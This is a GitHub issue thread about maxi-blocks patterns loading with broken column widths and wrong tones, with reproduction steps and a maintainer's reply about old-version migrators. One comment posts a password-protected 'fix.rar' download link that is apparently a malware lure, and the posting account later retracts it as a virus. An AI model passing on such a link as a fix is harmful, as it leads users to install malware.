### ISSUE TITLE
Styles are breaking after load from library

### ISSUE THREAD

**Issue by Olekrut** [maxi-blocks/maxi-blocks#5709]
### Description

Random bug was happened with 2 times on 3devdemo.com ( different pages ).
1 case : story mix 36 - top row with image have weird column width on different BPs. And when i ve tried to load light tone > it loads dark tone anyway
2 case : footer 68 - noticed weird styles for columns, width, wrong alignment for some of the texts.

If to clear cache and make hard refresh > everything gets ok

### Step-by-step reproduction instructions

1) create page> load some patterns > publish > close editor
2) open editor again > load patterns from issue list > repeat first 2 steps till you get bug

3) When you will get this bug, try to load the same pattern a few times
4) try to load light and dark tone 
5) If to clear cache and make hard refresh > everything gets ok

### Screenshots, screen recording, code snippet

story mix 36 - https://jam.dev/c/37a9b9e2-3b78-46db-ad83-7c080ccd8e49
footer 68 - https://jam.dev/c/c7da2618-fd9f-4253-939e-43abce0525c1

### URL and/or Code editor

Story Mix Pro 36 -  [bug with library.txt](https://github.com/user-attachments/files/16752115/bug.with.library.txt)
Footer Pro 68 -  [bug with library 2.txt](https://github.com/user-attachments/files/16752132/bug.with.library.2.txt)

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Olekrut** [comment]
similar situation to story 36
https://jam.dev/c/29414e0e-8502-4744-9eb5-dc10535452e8

[team pro 01.txt](https://github.com/user-attachments/files/16761326/team.pro.01.txt)

**Comment by Olekrut** [comment]
local - master
https://jam.dev/c/93beb586-c318-469a-bd4b-fa08fc15c883
story 36

**Comment by elzadj** [comment]
I can't re-create it, not on local, not on the dev site. Then only thing that I see, is that all the patterns you listed are old - they have variations of  ```maxi-version-current":"1.0.1","maxi-version-origin":"1.0.0-RC1``` in the code. So maybe one of the migrators doesn't work for you for some reason, sometimes.

If you can re-create it, or notice it again, please copy me all the migrators messages from the console. Jam videos are missing some of them with ```Can't display log data due to internal error``` for some reason, so I don't see the full picture.

**Comment by Olekrut** [comment]
@elzadj 
Team PRO 12
[team 12 bug.txt](https://github.com/user-attachments/files/16796931/team.12.bug.txt)
![image](https://github.com/user-attachments/assets/cae92986-a5f0-482c-8ab1-8a815d2a073e)

![image](https://github.com/user-attachments/assets/c6d9da55-2bd8-48d4-a18e-d6a69ffad935)
![image](https://github.com/user-attachments/assets/12461832-0007-44df-b6ca-900910bb46f0)
![image](https://github.com/user-attachments/assets/323b4201-69a1-4df5-a166-48473590eaca)

**Comment by MinecraftEarthVillage** [comment]
不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
